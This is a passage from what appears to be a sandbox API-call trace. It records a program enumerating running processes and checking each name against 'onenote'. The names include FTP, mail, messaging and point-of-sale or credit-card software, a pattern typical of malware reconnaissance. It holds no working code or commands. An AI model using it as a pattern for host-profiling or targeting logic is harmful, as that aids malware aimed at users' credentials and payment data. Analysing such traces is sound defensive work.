cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0098.073] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0098.073] StrStrIA (lpFirst="icq.exe", lpSrch="onenote") returned 0x0 [0098.073] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0098.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.074] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579d58 [0098.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579d58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.074] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0098.074] StrStrIA (lpFirst="leechftp.exe", lpSrch="onenote") returned 0x0 [0098.075] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0098.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.076] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579d88 [0098.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579d88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.076] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0098.076] StrStrIA (lpFirst="ncftp.exe", lpSrch="onenote") returned 0x0 [0098.076] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0098.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.077] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579bf0 [0098.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3579bf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0098.077] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0098.077] StrStrIA (lpFirst="notepad.exe", lpSrch="onenote") returned 0x0 [0098.077] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.078] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579c08 [0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3579c08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0098.078] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0098.079] StrStrIA (lpFirst="operamail.exe", lpSrch="onenote") returned 0x0 [0098.079] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0098.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.080] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579c20 [0098.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3579c20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0098.080] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0098.080] StrStrIA (lpFirst="outlook.exe", lpSrch="onenote") returned 0x0 [0098.080] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0098.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.081] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579c38 [0098.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3579c38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0098.081] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0098.081] StrStrIA (lpFirst="pidgin.exe", lpSrch="onenote") returned 0x0 [0098.081] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0098.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.084] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579f68 [0098.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579f68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0098.084] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0098.084] StrStrIA (lpFirst="scriptftp.exe", lpSrch="onenote") returned 0x0 [0098.084] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0098.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.085] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579f08 [0098.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3579f08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0098.085] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0098.085] StrStrIA (lpFirst="skype.exe", lpSrch="onenote") returned 0x0 [0098.085] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0098.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.086] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579f80 [0098.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579f80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.086] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0098.087] StrStrIA (lpFirst="smartftp.exe", lpSrch="onenote") returned 0x0 [0098.087] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0098.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.088] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579f98 [0098.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3579f98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0098.088] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0098.088] StrStrIA (lpFirst="thunderbird.exe", lpSrch="onenote") returned 0x0 [0098.088] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0098.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.089] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357a010 [0098.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x357a010, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0098.089] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0098.089] StrStrIA (lpFirst="totalcmd.exe", lpSrch="onenote") returned 0x0 [0098.089] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0098.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.091] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579ec0 [0098.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3579ec0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0098.091] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0098.091] StrStrIA (lpFirst="trillian.exe", lpSrch="onenote") returned 0x0 [0098.091] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0098.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.092] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579f20 [0098.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3579f20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0098.092] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0098.092] StrStrIA (lpFirst="webdrive.exe", lpSrch="onenote") returned 0x0 [0098.092] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0098.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.093] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579ea8 [0098.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3579ea8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.093] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0098.093] StrStrIA (lpFirst="whatsapp.exe", lpSrch="onenote") returned 0x0 [0098.093] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0098.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.095] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579fb0 [0098.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3579fb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0098.095] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0098.095] StrStrIA (lpFirst="winscp.exe", lpSrch="onenote") returned 0x0 [0098.095] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0098.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.096] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357aed8 [0098.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357aed8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0098.096] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0098.096] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="onenote") returned 0x0 [0098.096] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0098.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.097] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357af58 [0098.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357af58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0098.097] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0098.098] StrStrIA (lpFirst="active-charge.exe", lpSrch="onenote") returned 0x0 [0098.098] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0098.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.099] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579ed8 [0098.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3579ed8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0098.099] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0098.099] StrStrIA (lpFirst="accupos.exe", lpSrch="onenote") returned 0x0 [0098.099] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0098.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.100] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579fc8 [0098.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3579fc8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0098.100] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0098.100] StrStrIA (lpFirst="afr38.exe", lpSrch="onenote") returned 0x0 [0098.100] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0098.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.101] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579f38 [0098.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3579f38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0098.102] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0098.102] StrStrIA (lpFirst="aldelo.exe", lpSrch="onenote") returned 0x0 [0098.102] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0098.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0098.103] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3579fe0 [0098.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3579fe0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0098.103] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0098.103] StrStrIA (lpFirst="ccv_server.exe", lpSrch="onenote") returned 0x0 [0098.103] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0098.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0098.104] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357ad78 [0098.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357ad78, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0098.104] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0098.104] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="onenote") returned 0x0 [0098.104] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0098.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.105] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357aff8 [0098.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357aff8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) 